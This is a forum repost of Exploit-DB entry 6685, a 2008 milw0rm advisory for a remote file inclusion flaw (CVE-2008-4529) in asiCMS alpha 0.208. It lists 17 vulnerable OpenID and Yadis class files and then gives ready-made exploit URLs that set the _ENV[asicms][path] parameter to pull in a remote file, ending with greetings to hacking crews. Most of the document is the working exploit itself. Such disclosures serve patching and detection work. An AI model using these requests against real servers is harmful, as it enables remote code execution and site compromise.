- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6685
- Проверка EDB
-
- Пройдено
- Автор
- NOGE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4529
- Дата публикации
- 2008-10-06
Код:
===========================================================================================
[o] asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability
Software : asiCMS version alpha 0.208
Vendor : http://asicms.sourceforge.net/
Download : http://sourceforge.net/project/showfiles.php?group_id=203457
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
===========================================================================================
[o] Vulnerable file
classes/Auth/OpenID/Association.php
classes/Auth/OpenID/BigMath.php
classes/Auth/OpenID/DiffieHellman.php
classes/Auth/OpenID/DumbStore.php
classes/Auth/OpenID/Extension.php
classes/Auth/OpenID/FileStore.php
classes/Auth/OpenID/HMAC.php
classes/Auth/OpenID/MemcachedStore.php
classes/Auth/OpenID/Message.php
classes/Auth/OpenID/Nonce.php
classes/Auth/OpenID/SQLStore.php
classes/Auth/OpenID/SReg.php
classes/Auth/OpenID/TrustRoot.php
classes/Auth/OpenID/URINorm.php
classes/Auth/Yadis/XRDS.php
classes/Auth/Yadis/XRI.php
classes/Auth/Yadis/XRIRes.php
All the file is affected by _ENV[asicms][path] variable
[o] Exploit
http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=
===========================================================================================
[o] Greetz
MainHack BrotherHood [ www.mainhack.com ]
VOP Crew [ Vaksin13 OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ k1tk4t
skulmatic olibekas ulga Cungkee str0ke
===========================================================================================
# milw0rm.com [2008-10-06]
- Источник
- www.exploit-db.com